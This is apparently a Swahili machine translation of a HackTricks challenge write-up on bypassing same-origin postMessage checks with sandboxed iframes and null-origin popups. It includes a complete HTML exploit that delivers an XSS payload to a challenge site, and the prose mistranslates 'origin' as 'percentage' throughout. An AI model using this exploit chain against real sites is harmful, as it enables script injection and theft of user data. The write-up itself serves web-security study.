Bypassing SOP with Iframes - 1

Reading time: 3 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Iframes in SOP-1

Katika changamoto iliyoundwa na NDevTK na Terjanq unahitaji kutumia XSS katika coded

javascript

const identifier = "4a600cd2d4f9aa1cfb5aa786"
onmessage = (e) => {
const data = e.data
if (e.origin !== window.origin && data.identifier !== identifier) return
if (data.type === "render") {
renderContainer.innerHTML = data.body
}
}

Tatizo kuu ni kwamba ukurasa mkuu unatumia DomPurify kutuma data.body, hivyo ili kutuma data yako ya html kwa hiyo code unahitaji bypass e.origin !== window.origin.

Tuone suluhisho wanalo pendekeza.

SOP bypass 1 (e.origin === null)

Wakati //example.org imewekwa ndani ya sandboxed iframe, basi asilimia ya ukurasa itakuwa null, yaani window.origin === null. Hivyo kwa kuweka iframe kupitia <iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php"> tunaweza kulazimisha asilimia null.

Ikiwa ukurasa ungeweza kuwekwa, ungeweza kupita ulinzi huo kwa njia hiyo (cookies pia zinaweza kuhitaji kuwekwa kuwa SameSite=None).

SOP bypass 2 (window.origin === null)

Hali isiyojulikana sana ni kwamba wakati sandbox value allow-popups imewekwa basi popup iliyo funguliwa itachukua sifa zote za sandboxed isipokuwa allow-popups-to-escape-sandbox imewekwa.
Hivyo, kufungua popup kutoka asilimia null kutafanya window.origin ndani ya popup pia iwe null.

Suluhisho la Changamoto

Kwa hivyo, kwa changamoto hii, mtu anaweza kuunda iframe, kufungua popup kwa ukurasa wenye handler ya XSS iliyo hatarini (/iframe.php), kwani window.origin === e.origin kwa sababu zote ni null inawezekana kutuma payload itakayofanya exploit XSS.

Hiyo payload itapata kitambulisho na kutuma XSS kurudi kwenye ukurasa wa juu (ukurasa uliofungua popup), ambayo itabadilisha mahali kwenda kwenye /iframe.php iliyo hatarini. Kwa sababu kitambulisho kinajulikana, haijalishi kwamba hali window.origin === e.origin haijaridhika (kumbuka, asilimia ni popup kutoka iframe ambayo ina asilimia null) kwa sababu data.identifier === identifier. Kisha, XSS itasababisha tena, wakati huu katika asilimia sahihi.

html

<body>
<script>
f = document.createElement("iframe")

// Needed flags
f.sandbox = "allow-scripts allow-popups allow-top-navigation"

// Second communication with /iframe.php (this is the top page relocated)
// This will execute the alert in the correct origin
const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');
},1000);`.replaceAll("\n", " ")

// Initial communication
// Open /iframe.php in a popup, both iframes and popup will have "null" as origin
// Then, bypass window.origin === e.origin to steal the identifier and communicate
// with the top with the second XSS payload
f.srcdoc = `
<h1>Click me!</h1>
<script>
onclick = e => {
let w = open('https://so-xss.terjanq.me/iframe.php');
onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';
setTimeout(_ => {
w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')
}, 1000);
};
<\/script>
`
document.body.appendChild(f)
</script>
</body>

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.